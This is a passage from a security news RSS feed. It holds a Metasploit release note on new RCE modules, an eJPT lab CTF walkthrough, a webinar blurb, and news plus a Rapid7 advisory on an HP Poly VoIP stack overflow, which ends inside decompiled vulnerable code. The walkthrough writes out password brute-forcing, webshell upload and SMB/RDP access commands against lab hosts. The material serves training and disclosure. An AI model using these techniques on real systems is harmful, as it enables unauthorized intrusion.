<title><![CDATA[Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum]]></title>
<description><![CDATA[When Open Source is a bit too OpenSeveral fun modules landed this week, including an Apache RCE, Windows Kernel pointer collection, and Gogs RCE via naming. Leading off is Gogs' RCE that allows an attacker to execute commands by naming their branch --exec  and requesting a rebase.Another useful p...]]></description>
<link>https://tsecurity.de/de/3576745/it-security-nachrichten/weekly-metasploit-update-apache-activemq-rce-gogs-rebase-rce-and-windows-kernel-pointer-enum/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576745/it-security-nachrichten/weekly-metasploit-update-apache-activemq-rce-gogs-rebase-rce-and-windows-kernel-pointer-enum/</guid>
<pubDate>Sat, 06 Jun 2026 01:22:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>When Open Source is a bit too Open</h2><p>Several fun modules landed this week, including an Apache RCE, Windows Kernel pointer collection, and Gogs RCE via naming. Leading off is Gogs' RCE that allows an attacker to execute commands by naming their <span data-type="inlineCode">branch </span><span data-type="inlineCode">--exec &lt;command&gt;</span> and requesting a rebase.</p><p>Another useful post module by CharlesQuinnDev enumerates the Kernel pointers leaked via the popular <span data-type="inlineCode">NtQuerySystemInformation</span> technique. Those exposed pointers, combined with a good write primitive, make local privilege escalation easier to accomplish. Several local privilege escalations already use that technique, so exposing just that technique was a great call!</p><h2>New module content (3)</h2><h3>Apache ActiveMQ RCE via Jolokia addNetworkConnector</h3><p><strong>Authors:</strong> dinosn and h00die<br><strong>Type:</strong> Exploit<br><strong>Pull request:</strong> <a href="https://github.com/rapid7/metasploit-framework/pull/21497">#21497</a> contributed by <a href="https://github.com/h00die">h00die</a><br><strong>Path:</strong> <span data-type="inlineCode">multi/http/apache_activemq_jolokia_rce</span><br><strong>AttackerKB reference:</strong> <a href="https://attackerkb.com/search?q=CVE-2026-34197&amp;referrer=blog">CVE-2026-34197</a></p><p>Adds a new exploit module exploit/multi/http/apache_activemq_jolokia_rce targeting CVE-2026-34197 in Apache ActiveMQ. The module abuses the Jolokia JMX-over-HTTP API exposed at <span data-type="inlineCode">/api/jolokia/</span> by calling the <span data-type="inlineCode">addNetworkConnector()</span> MBean operation with a crafted <span data-type="inlineCode">brokerConfig=xbean:http://...</span><span data-type="inlineCode"> </span>URI. ActiveMQ fetches the attacker-controlled URL and instantiates it as a Spring XML application context, achieving remote code execution via a <span data-type="inlineCode">java.lang.ProcessBuilder</span> bean. Authentication is required to exploit this vulnerability.</p><h3>Gogs Git Rebase Argument Injection RCE</h3><p><strong>Author:</strong> Crypto-Cat<br><strong>Type:</strong> Exploit<br><strong>Pull request:</strong> <a href="https://github.com/rapid7/metasploit-framework/pull/21515">#21515</a> contributed by <a href="https://github.com/jburgess-r7">jburgess-r7</a><br><strong>Path:</strong> <span data-type="inlineCode">multi/http/gogs_rebase_rce</span></p><p>This adds an exploit module for the Gogs rebase Remote Code Execution (RCE) vulnerability. The module leverages an argument injection flaw residing in the pull request merge workflow of Gogs versions &lt;= 0.14.2 and &lt;= 0.15.0+dev.</p><h3>Windows Kernel Pointer Exposure Enumerator</h3><p><strong>Author:</strong> CharlesQuinnDev<br><strong>Type:</strong> Post<br><strong>Pull request:</strong> <a href="https://github.com/rapid7/metasploit-framework/pull/21039">#21039</a> contributed by <a href="https://github.com/CharlesQuinnDev">CharlesQuinnDev</a><br><strong>Path:</strong> <span data-type="inlineCode">windows/gather/windows_kernel_pointer_enum</span></p><p>Adds a new post module for Windows that enumerates kernel object pointers exposed through <span data-type="inlineCode">NtQuerySystemInformation</span> on <span data-type="inlineCode">x64</span> systems. The module collects observable handle metadata and provides analysis of pointer distribution, object types, and ALPC usage, then saves the results to a CSV loot file for review. Also introduces a reusable Windows kernel handle-enumeration library.</p><h2>Enhancements and features (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20881">#20881</a> from <a href="https://github.com/h00die">h00die</a> - This adds support for cracking Kerberos type hashes in Metasploit, specifically timeroasting, krb5tgs* and krb5asrep.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21087">#21087</a> from <a href="https://github.com/jbx81-1337">jbx81-1337</a> - The new payloads_manager plugin lets you maintain a local archive of custom payloads and stage them into the data directory. Use the <span data-type="inlineCode">fetch</span> or <span data-type="inlineCode">add</span> subcommands to download or import a payload, then select to symlink it into place so it's available to other modules. The plugin tracks each payload's name, hash, tags, and description in a database.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21412">#21412</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates Metasploit's post modules to now run by default against the last opened alive session, unless explicitly specified.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21429">#21429</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Removes the now redundant Linux-specific method for finding the arch so there's a single source of truth that works in a superset of platform / session-type combinations.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21488">#21488</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates HTTP login scanners to report the detected service hierarchy.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21504">#21504</a> from <a href="https://github.com/h00die">h00die</a> - Adds missing CVE references to seven existing modules: gladinet_storage_access_ticket_forge (CVE-2025-14611), cassandra_web_file_read (CVE-2020-36939), pretalx_file_read_cve_2023_28459 (CVE-2023-28459 and CVE-2023-28458), centreon_pollers_auth_rce (CVE-2019-19699), wp_responsive_thumbnail_slider_upload (CVE-2015-10144), xerte_unauthenticated_template_import_rce (CVE-2026-32985), and solarwinds_storage_manager_sql (CVE-2012-2576).</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21526">#21526</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Makes stability and logging improvements to the ipmi_cipher_zero, ipmi_dumphashes, and ipmi_version modules.</li></ul><h2>Bugs fixed (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21432">#21432</a> from <a href="https://github.com/4ravind-b">4ravind-b</a> - Fixes a bug in modules that invoke other modules that prevented datastore options from being validated.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21448">#21448</a> from <a href="https://github.com/kx7m2qd">kx7m2qd</a> - Fixes an issue where CIDR range filters in the addresses parameter of the db.hosts RPC endpoint were not processed correctly.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21484">#21484</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Fixes python ssl command shell payloads that failed with AttributeError: module 'ssl' has no attribute 'wrap_socket'.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21489">#21489</a> from <a href="https://github.com/h00die">h00die</a> - Improves the GitLab version scanner by handling additional exceptions in the scanner for non-GitLab targets and adding additional version fingerprints for real GitLab targets.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21502">#21502</a> from <a href="https://github.com/h00die">h00die</a> - Fixes a crash in the scanner/snmp/snmp_enum module when the system date was read as Null.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21506">#21506</a> from <a href="https://github.com/h00die">h00die</a> - Adds a guard clause when running <span data-type="inlineCode">uname -r</span> in WSL startup_folder persistence.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21514">#21514</a> from <a href="https://github.com/orbit-bot">orbit-bot</a> - Fixes a couple of references to outdated msfvenom options.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-05-26T12%3A02%3A08Z..2026-06-04T12%3A43%3A08Z%22">Pull Requests 6.4.135...6.4.136</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.135...6.4.136">Full diff 6.4.135...6.4.136</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Host & Network Penetration Testing: System-Host Based Attacks CTF 1 — eJPT (INE)]]></title>
<description><![CDATA[A walkthrough covering HTTP brute-forcing, WebDAV exploitation, and SMB enumeration to capture all four flagsHello everyone! 👋In this blog, I’ll walk through the System/Host-Based Attacks CTF 1 from INE’s eJPT path and explain how I approached each flag. The focus is on methodology and reasoning ...]]></description>
<link>https://tsecurity.de/de/3574572/hacking/host-network-penetration-testing-system-host-based-attacks-ctf-1-ejpt-ine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574572/hacking/host-network-penetration-testing-system-host-based-attacks-ctf-1-ejpt-ine/</guid>
<pubDate>Fri, 05 Jun 2026 08:50:01 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>A walkthrough covering HTTP brute-forcing, WebDAV exploitation, and SMB enumeration to capture all four flags</em></h4><p>Hello everyone! 👋</p><p>In this blog, I’ll walk through the <strong>System/Host-Based Attacks CTF 1</strong> from INE’s eJPT path and explain how I approached each flag. The focus is on methodology and reasoning — not just dropping commands.</p><p>This lab has two Windows targets: <strong>target1.ine.local</strong> and <strong>target2.ine.local</strong>. The goal is to capture four flags hidden across both machines using system and host-based attack techniques.</p><p><strong>Useful files provided by the lab:</strong></p><pre>/usr/share/metasploit-framework/data/wordlists/common_users.txt<br>/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt<br>/usr/share/webshells/asp/webshell.asp</pre><p>So, let’s dive in.</p><h3>Q. User ‘bob’ might not have chosen a strong password. Try common passwords. (target1.ine.local)</h3><p>As usual, I started with an Nmap scan to identify the running services.</p><pre>nmap -sV -sC -T5 target1.ine.local</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1010/1*8B349oN2IkzsDG9zoPYn_Q.png"><figcaption>Nmap scan results</figcaption></figure><p>The scan showed that <strong>port 80</strong> was open running <strong>Microsoft IIS</strong> 10.0, but it returned a <strong>401 Unauthorized</strong> — meaning it was protected by HTTP Basic Authentication. Ports 135, 139, 445 (SMB), and 3389 (RDP) were also open.</p><p>I navigated to http://target1.ine.local in the browser and it immediately asked for credentials.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qVzqfjkgO8yE7eCtR6EA7w.png"><figcaption>The site was asking for authentication.</figcaption></figure><p>Since the question already hinted that <strong>Bob might have a weak password</strong>, I decided to brute-force his password using Hydra and a common password list.</p><pre>hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get /</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OY4CgXTd2CHwXbHKjm0deA.png"><figcaption>Hydra Result</figcaption></figure><p>Hydra successfully identified Bob’s password.</p><p>Now I had valid credentials. I logged in, I didn’t find anything useful on the homepage, so I moved on to directory enumeration with DIRB.</p><pre>dirb http://target1.ine.local -u bob:&lt;password&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/826/1*bCrwPMKaDoIobUsRDWvhgA.png"><figcaption>DIRB Result</figcaption></figure><p>DIRB found two directories — /aspnet_client/ and /webdav/. The WebDAV directory was listable, so I navigated straight to it: <a href="http://target1.ine.local/webdav/">http://target1.ine.local/webdav/</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/795/1*Nv21hdO9O5_OW0rNiXpadQ.png"></figure><p>And there it was — flag1.txt sitting right in the directory listing.</p><h3>Q. Valuable files are often on the C:\ drive. Explore it thoroughly. (target1.ine.local)</h3><p>Since WebDAV was open and writable, I first ran DAVTest to check which file types the server would accept and execute:</p><pre>davtest -auth bob:&lt;Password&gt; -url http://target1.ine.local/webdav</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4HwOIE5F9zGL1sOL49tBfQ.png"></figure><p>.asp files were both uploadable and executable — exactly what I needed, since the lab provides a pre-built ASP webshell.</p><p>I used Cadaver (a command-line WebDAV client) to upload it:</p><pre>cadaver http://target1.ine.local<br>dav:/&gt; cd webdav<br>dav:/webdav/&gt; put /usr/share/webshells/asp/webshell.asp</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/798/1*G4htWaE7_ChswycN6tYo0w.png"></figure><p>After uploading the shell, I accessed it from the browser.</p><pre>http://target1.ine.local/webdav/webshell.asp</pre><p>The shell executed successfully and allowed command execution on the target.</p><p>From there, I started enumerating the contents of the <em>C:\</em> drive.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/994/1*s4q8HLylBbA-KVNeCvwhow.png"></figure><p>The C: drive listing came back — and flag2.txt was sitting right there in the root.</p><h3>Q. SMB shares might contain hidden files. Check the available shares. (target2.ine.local)</h3><p>The question hinted toward SMB enumeration, so I started with another Nmap scan.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/955/1*SuRoPLKhrHzfKoR-VszH0Q.png"></figure><p>No web server this time. But port <strong>445 (SMB) </strong>and port <strong>3389 (RDP)</strong> were both open — running Windows Server 2008 R2–2012.</p><p>I used Metasploit’s smb_login module to brute-force the Administrator account:</p><pre>use auxiliary/scanner/smb/smb_login<br>set rhost target2.ine.local<br>set SMBUser administrator<br>set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt<br>set verbose false<br>run</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hdXBYRxSBMRBbfu3xOdbCg.png"></figure><p>Got it on the first run.</p><p>With valid credentials, I listed the available SMB shares:</p><pre>smbclient -L //target2.ine.local -U administrator</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/975/1*ClKXNl36CO5n8Y6BuA6jqQ.png"></figure><p>Several shares came back — ADMIN$, C$, IPC$, Shared, Shared2, Shared3. The C$ administrative share looked most interesting, so I connected to it:</p><pre>smbclient //target2.ine.local/C$ -U administrator</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/811/1*f1yyeC7zghjW8UYByCZwUA.png"></figure><p>Right there in the C: drive root — flag3.txt.</p><h3>Q. The Desktop directory might have what you’re looking for. Enumerate its contents. (target2.ine.local)</h3><p>Still in the same smbclient session, the hint was straightforward — check the Desktop:</p><pre>smb: \&gt; ls .\Users\Administrator\Desktop\</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/886/1*THPTyIhrg9YaMMG3699A6A.png"></figure><p>Inside the Desktop folder, I found the <strong>fourth flag</strong>.</p><h3>Bonus: RDP Access</h3><p>Since port 3389 was open and we had valid Administrator credentials from the SMB brute-force, I couldn’t resist trying RDP:</p><pre>xfreerdp /u:administrator /p:&lt;Password&gt; /v:target2.ine.local:3389</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*r_cHN1xhySro8z7FA_M2ew.png"><figcaption>RDP access</figcaption></figure><p>Accepted the self-signed certificate and got a full Windows Server desktop. Complete access — no further exploitation needed.</p><h3>Final Thoughts</h3><p>This CTF is a solid exercise in chaining simple techniques together. No complex exploits — just weak passwords, a misconfigured WebDAV server, and an exposed SMB share doing all the damage.</p><p>The big lesson here: <strong>credentials are everything</strong>. Both targets fell because of weak passwords. Once you have valid credentials, the rest is just enumeration. And the same Administrator password that cracked SMB also opened RDP — a reminder that credential reuse is one of the most reliable pivot points in any engagement.</p><p>Thanks for reading!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9cca24e33039" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/host-network-penetration-testing-system-host-based-attacks-ctf-1-ejpt-ine-9cca24e33039">Host &amp; Network Penetration Testing: System-Host Based Attacks CTF 1 — eJPT (INE)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond the Zero-Day: See Your Network Like an Attacker | Webinar with HD Moore]]></title>
<description><![CDATA[Assume the breach. Zero-days keep shipping, AI is writing exploits faster than anyone patches, and "patch everything in time" stopped working years ago. Stop betting the org on winning that race. You don't control which bug lands. You control what it can reach once it does.

That is a question ab...]]></description>
<link>https://tsecurity.de/de/3569571/it-security-nachrichten/beyond-the-zero-day-see-your-network-like-an-attacker-webinar-with-hd-moore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569571/it-security-nachrichten/beyond-the-zero-day-see-your-network-like-an-attacker-webinar-with-hd-moore/</guid>
<pubDate>Wed, 03 Jun 2026 14:39:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Assume the breach. Zero-days keep shipping, AI is writing exploits faster than anyone patches, and "patch everything in time" stopped working years ago. Stop betting the org on winning that race. You don't control which bug lands. You control what it can reach once it does.

That is a question about the shape of your network, and most teams have the shape wrong. HD Moore, creator of Metasploit]]></content:encoded>
</item>
<item>
<title><![CDATA[HP Poly VoIP vulnerability sets the stage for executive voice deepfakes]]></title>
<description><![CDATA[HP has released patches for a critical buffer overflow vulnerability in multiple IP-enabled conference phones from its Poly Voice line. The flaw allows unauthenticated attackers to obtain root privileges on the underlying operating system, potentially enabling them to execute other attacks such a...]]></description>
<link>https://tsecurity.de/de/3567647/it-security-nachrichten/hp-poly-voip-vulnerability-sets-the-stage-for-executive-voice-deepfakes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567647/it-security-nachrichten/hp-poly-voip-vulnerability-sets-the-stage-for-executive-voice-deepfakes/</guid>
<pubDate>Tue, 02 Jun 2026 23:23:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>HP has released patches for a critical buffer overflow vulnerability in multiple IP-enabled conference phones from its Poly Voice line. The flaw allows unauthenticated attackers to obtain root privileges on the underlying operating system, potentially enabling them to execute other attacks such as eavesdropping on conversations and recording voice data for AI-enabled impersonation attacks.</p>



<p>The vulnerability, <a href="https://support.hp.com/us-en/document/ish_15052661-15052687-16/hpsbpy04083">tracked as CVE-2026-0826</a>, was discovered by researchers from security firm Rapid7 and resides in the code that parses Session Description Protocol (SDP) attributes when the Interactive Connectivity Establishment (ICE) feature is enabled.</p>



<p>ICE enables VoIP devices to establish peer-to-peer connections using the shortest available network path. The feature is not enabled by default on HP Poly devices, and the company advises administrators to disable it if it’s not needed.</p>



<p>The flaw, rated 9.2 on the CVSS severity scale, affects all phones from the HP Poly VVX series, as well as the Trio 8300, 8500, and 8800 IP conference devices. HP has fixed the flaw in its Poly Unified Communications Software (UCS) versions 6.4.8 for the VVX devices, 8.1.7 for the Trio 8300, and 7.2.8 for Trio 8500 and 8800.</p>



<h2 class="wp-block-heading">VoIP exploit is public for pen testing</h2>



<p>An exploit module targeting this vulnerability has already been developed and released for the widely used Metasploit penetration testing framework that’s maintained by Rapid7.</p>



<p>The exploit executes code as root on an affected device with ICE enabled by sending a SIP INVITE request with a specially crafted candidate attribute. This attribute normally contains a transport address that can be used for connectivity checks and is part of the ICE RFC8839 standard.</p>



<p>The buffer overflow bug is located in a helper function called <code>ParseICECandidate</code> in the <code>polyapp</code> binary that processes such requests on the device.</p>



<p>“The start of the function contains a call to <code>memcpy</code>, which will copy the incoming string line being processed into a 256 byte stack buffer,” Stephen Fewer, senior principal security researcher at Rapid7, said in <a href="https://www.rapid7.com/blog/post/ve-cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-hp-poly-vvx-trio-voip-phones-fixed/">a blog post</a>. “No length check is performed to ensure the incoming string length is less than 256 bytes. Therefore by providing a candidate attribute whose length is greater than 256 bytes, a stack-based buffer overflow will occur.”</p>



<p>Address Space Layout Randomization (ASLR), a kernel feature that randomizes memory addresses to defeat buffer overflow exploits, is enabled on the device. However, the protection is not operating correctly on the HP Poly devices because it does not randomize the load addresses of .so (Shared Object) libraries.</p>



<p>These libraries, such as <code>libc</code>, are loaded by other processes, including the <code>polyapp</code> process, and because their memory addresses never change, they can be leveraged to bypass ASLR and execute the attacker’s payload.</p>



<p>“We create a ROP chain that will execute an arbitrary OS command via the system standard C library function,” Fewer said. “The accompanying Metasploit exploit modules source code details the entire ROP chain.”</p>



<h2 class="wp-block-heading">VoIP phones are attractive targets</h2>



<p>Attackers have increasingly targeted embedded devices inside enterprise networks in recent years because unlike laptops, workstations, and servers, these devices are not monitored by endpoint detection and response (EDR) products. As such, they provide perfect footholds inside corporate environments that allow attackers to remain undetected for long periods of time and attack other systems.</p>



<p>In the age of AI these devices become even more relevant for attackers, going beyond corporate espionage by recording conversations or internal network pivoting.</p>



<p>“Attackers no longer need massive datasets to make use of synthetic speech tooling,” Douglas McKee, Rapid7’s director of vulnerability intelligence, said in <a href="https://www.rapid7.com/blog/post/ve-cve-2026-0826-how-an-old-bug-can-feed-ai-powered-impersonation/">a blog post</a>. “In many cases, they just need clean source audio of the right person saying enough words in enough contexts. That has made executive voice data, call recordings, and live conversation capture far more valuable than many organizations seem prepared to admit.”</p>



<p>Attackers could collect audio and then use <a href="https://www.csoonline.com/article/3982379/deepfake-attacks-are-inevitable-cisos-cant-prepare-soon-enough.html">AI deepfakes to impersonate executives</a> in calls to employees and business partners to authorize fraudulent transactions, gain access to sensitive systems, and more.</p>



<p>“The concern is not just ‘someone might hear something confidential,’” McKee said. “That would be bad enough. The broader concern is that voice infrastructure can now support both traditional espionage objectives and modern AI-enabled fraud operations at the same time.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-0826: Critical unauthenticated stack buffer overflow in HP Poly VVX and Trio VoIP Phones (FIXED)]]></title>
<description><![CDATA[OverviewRapid7 Labs conducted a zero-day research project against an HP Poly VVX 450 Voice over Internet Protocol (VoIP) phone. This research resulted in the discovery of a critical unauthenticated stack-based buffer overflow vulnerability, CVE-2026-0826. A remote attacker can leverage CVE-2026-0...]]></description>
<link>https://tsecurity.de/de/3563223/it-security-nachrichten/cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-in-hp-poly-vvx-and-trio-voip-phones-fixed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563223/it-security-nachrichten/cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-in-hp-poly-vvx-and-trio-voip-phones-fixed/</guid>
<pubDate>Mon, 01 Jun 2026 15:35:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><a href="https://www.rapid7.com/research" target="_self"><span>Rapid7 Labs</span></a><span> conducted a zero-day research project against an </span><a href="https://www.hp.com/ie-en/products/accessories/product-details/2101802544" target="_blank"><span>HP Poly VVX 450</span></a><span> Voice over Internet Protocol (VoIP) phone. This research resulted in the discovery of a critical unauthenticated stack-based buffer overflow vulnerability, CVE-2026-0826. A remote attacker can leverage CVE-2026-0826 to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. </span></p><p><span>The vulnerability is present in the device's parsing of </span><a href="https://en.wikipedia.org/wiki/Session_Description_Protocol" target="_blank"><span>Session Description Protocol</span></a><span> (SDP) attributes for </span><a href="https://en.wikipedia.org/wiki/Interactive_Connectivity_Establishment" target="_blank"><span>Interactive Connectivity Establishment</span></a><span> (ICE). The ICE feature, which is not enabled by default, must be enabled for the device to be exploitable by a remote attacker. </span></p><p><span>While we discovered and validated the vulnerability on a VVX 450 device, the vulnerability has been confirmed to affect all models in the VVX series (VVX 150, VVX 250, VVX 350, and VVX 450), as well as three models from the </span><a href="https://www.hp.com/ie-en/poly/phones/ip-conference.html" target="_blank"><span>Trio IP Conference</span></a><span> series (Trio 8800, Trio 8500, and Trio 8300).</span></p><p><span>CVE-2026-0826 has a CVSSv4 score of </span><a href="https://www.first.org/cvss/calculator/4-0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" target="_blank"><span>9.2 (Critical)</span></a><span>, and a Common Weakness Enumeration (CWE) of </span><a href="https://cwe.mitre.org/data/definitions/121.html" target="_blank"><span>CWE-121: Stack-based Buffer Overflow</span></a><span>.</span></p><h2>Impact</h2><p><span>A </span><a href="https://www.metasploit.com/" target="_blank"><span>Metasploit</span></a><span> exploit module has been developed to demonstrate how an unauthenticated attacker could leverage this vulnerability to gain root privileges on a vulnerable device.</span></p><p><span>Shown below is the exploit being run against a target Poly VVX 450 device running a vulnerable firmware version </span><span><span data-type="inlineCode">6.4.7.4477</span></span><span>.</span></p><p><span> </span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8e342bfb60ff8f6b/6a15eaebfb2fcd857cc3bd0c/image1.png" alt="image1.png" caption="Figure 1: Metasploit exploit module targeting a Poly VVX 450 device." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="image1.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8e342bfb60ff8f6b/6a15eaebfb2fcd857cc3bd0c/image1.png" data-sys-asset-uid="blt8e342bfb60ff8f6b" data-sys-asset-filename="image1.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Metasploit exploit module targeting a Poly VVX 450 device." data-sys-asset-alt="image1.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Metasploit exploit module targeting a Poly VVX 450 device.</figcaption></div></figure><p>⠀</p><p><span>As we can see above, the attacker achieves unauthenticated RCE with root privileges on the device. This is demonstrated by the attacker executing a reverse shell payload and running several arbitrary OS shell commands.</span></p><h2>Technical analysis</h2><p><span>Our analysis is based upon a VVX 450 device running firmware version </span><span><span data-type="inlineCode">6.4.7.4477</span></span><span>. During testing, the test device had an IPv4 address of </span><span><span data-type="inlineCode">192.168.86.80</span></span><span>. The non-default ICE feature was enabled by specifying the following in the device configuration:</span></p><p><span></span></p><pre language="html">device.feature.nat.ice.enabled="1"</pre><p></p><p><span>The main binary that provides the majority of functionality to the device is </span><span><span data-type="inlineCode">/user/local/root/polyapp</span></span><span> (32 bit ARM, Little Endian). This binary parses SDP data provided in an </span><a href="https://en.wikipedia.org/wiki/Session_Initiation_Protocol" target="_blank"><span>Session Initiation Protocol</span></a><span> (SIP) request over UDP on port 5060.</span></p><p><span>When SDP data is processed, if ICE is enabled, an SDP attribute named candidate can be parsed. The candidate attribute is intended to contain a transport address for a candidate that can be used for connectivity checks. An example of a valid candidate attribute can be seen in the </span><a href="https://datatracker.ietf.org/doc/html/rfc8839#section-5.1" target="_blank"><span>RFC8839 5.1</span></a><span>:</span></p><p><span></span></p><blockquote><span><em>The following is an example SDP line for a UDP server-reflexive "candidate" attribute for the RTP component:</em></span></blockquote><blockquote><span><em>a=candidate:2 1 UDP 1694498815 192.0.2.3 45664 typ srflx raddr 203.0.113.141 rport 8998</em></span></blockquote><p></p><p><span>Using the example from the RFC, a SIP request can contain SDP data that looks like this, with the </span><span><span data-type="inlineCode">candidate</span></span><span> attribute appearing on the final line:</span></p><p><span></span></p><pre language="html">c=IN IP4 192.168.86.122
m=audio 50786 RTP/AVP 0
a=rtpmap:0 PCMU/8000/1
a=candidate:2 1 UDP 1694498815 192.0.2.3 45664 typ srflx raddr 203.0.113.141 rport 8998</pre><p>⠀</p><p><span>The </span><span><span data-type="inlineCode">/user/local/root/polyapp</span></span><span> binary has two functions that will parse incoming SDP data, named </span><span><span data-type="inlineCode">ParseRemoteSDP</span></span><span> and </span><span><span data-type="inlineCode">IceSession::ParseRemoteSdpForAddresses</span></span><span>. In both cases, when a string line starting with “</span><span><span data-type="inlineCode">a=candidate:</span></span><span>”  is found, a helper function </span><span><span data-type="inlineCode">ParseICECandidate</span></span><span> (at address </span><span><span data-type="inlineCode">0xB12780</span></span><span>) is called to parse the expected </span><span><span data-type="inlineCode">candidate</span></span><span> attribute held in the remainder of that string line. The intent is to parse out the individual components of a </span><span><span data-type="inlineCode">candidate</span></span><span> attribute which are separated by white space characters.</span></p><p><span>This helper function </span><span><span data-type="inlineCode">ParseICECandidate</span></span><span> contains a stack based buffer overflow. Shown below we can see that the start of the function contains a call to </span><span><span data-type="inlineCode">memcpy</span></span><span>, which will copy the incoming string line being processed into a 256 byte stack buffer. No length check is performed to ensure the incoming string length is less than 256 bytes. Therefore by providing a candidate attribute whose length is greater than 256 bytes, a stack-based buffer overflow will occur.</span></p><p><span></span></p><pre language="c">int __fastcall ParseICECandidate( const void *string_line, size_t string_line_length, int a3, int *a4, _DWORD *a5, int *a6, std::string *a7, _DWORD *a8, _DWORD *a9, std::string *a10, _DWORD *a11)
{
	size_t v11; // r0
	char *v12; // r0
	size_t v13; // r0
	char *v14; // r0
	size_t v15; // r0
	char buffer256[256]; // [sp+25h] [bp-11Fh] BYREF
	char v22[7]; // [sp+128h] [bp-1Ch] BYREF
	char v23; // [sp+12Fh] [bp-15h] BYREF
	char *nptr; // [sp+130h] [bp-14h]
	char v25; // [sp+137h] [bp-Dh]

	v25 = 0;
	if ( !string_line )
		return 0;
	memcpy(buffer256, string_line, string_line_length); // &lt;--- buffer256 can be overflowed due to no destination length check
	buffer256[string_line_length] = 0;
	nptr = strtok_r(buffer256, ":", (char **)&amp;buffer256[255]);
	nptr = strtok_r(0, " ", (char **)&amp;buffer256[255]);
	if ( !nptr )
